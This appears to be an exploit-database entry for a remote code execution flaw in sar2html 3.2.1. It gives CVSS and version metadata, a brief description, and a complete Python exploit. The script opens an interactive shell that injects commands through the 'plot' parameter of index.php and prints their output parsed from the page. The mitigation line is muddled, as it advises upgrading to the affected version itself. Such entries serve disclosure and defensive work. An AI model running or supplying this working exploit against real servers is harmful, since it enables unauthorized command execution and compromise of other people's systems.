Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution

vendor:

sar2html

by:

Musyoka Ian

9.8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: sar2html

Affected Version From: 3.2.1

Affected Version To: 3.2.1

Patch Exists: YES

Related CWE: N/A

CPE: a:cemtan:sar2html:3.2.1

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Ubuntu 18.04.1

2020

Exploit Title: sar2html 3.2.1 – ‘plot’ Remote Code Execution

A vulnerability exists in sar2html 3.2.1 which allows an attacker to execute arbitrary code on the vulnerable system. This is due to the application not properly validating user-supplied input before using it in a system call. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious code to the vulnerable server. Successful exploitation of this vulnerability could result in arbitrary code execution on the vulnerable system.

Mitigation:

Upgrade to the latest version of sar2html 3.2.1 or apply the appropriate patch.

Source

Exploit-DB raw data:

# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
# Date: 27-12-2020
# Exploit Author: Musyoka Ian
# Vendor Homepage:https://github.com/cemtan/sar2html 
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Ubuntu 18.04.1

#!/usr/bin/env python3

import requests
import re
from cmd import Cmd

url = input("Enter The url => ")

class Terminal(Cmd):
    prompt = "Command => "
    def default(self, args):
        exploiter(args)

def exploiter(cmd):
    global url
    sess = requests.session()
    output = sess.get(f"{url}/index.php?plot=;{cmd}")
    try:
        out = re.findall("<option value=(.*?)>", output.text)
    except:
        print ("Error!!")
    for ouut in out:
        if "There is no defined host..." not in ouut:
            if "null selected" not in ouut:
                if "selected" not in ouut:
                    print (ouut)
    print ()

if __name__ == ("__main__"):
    terminal = Terminal()
    terminal.cmdloop()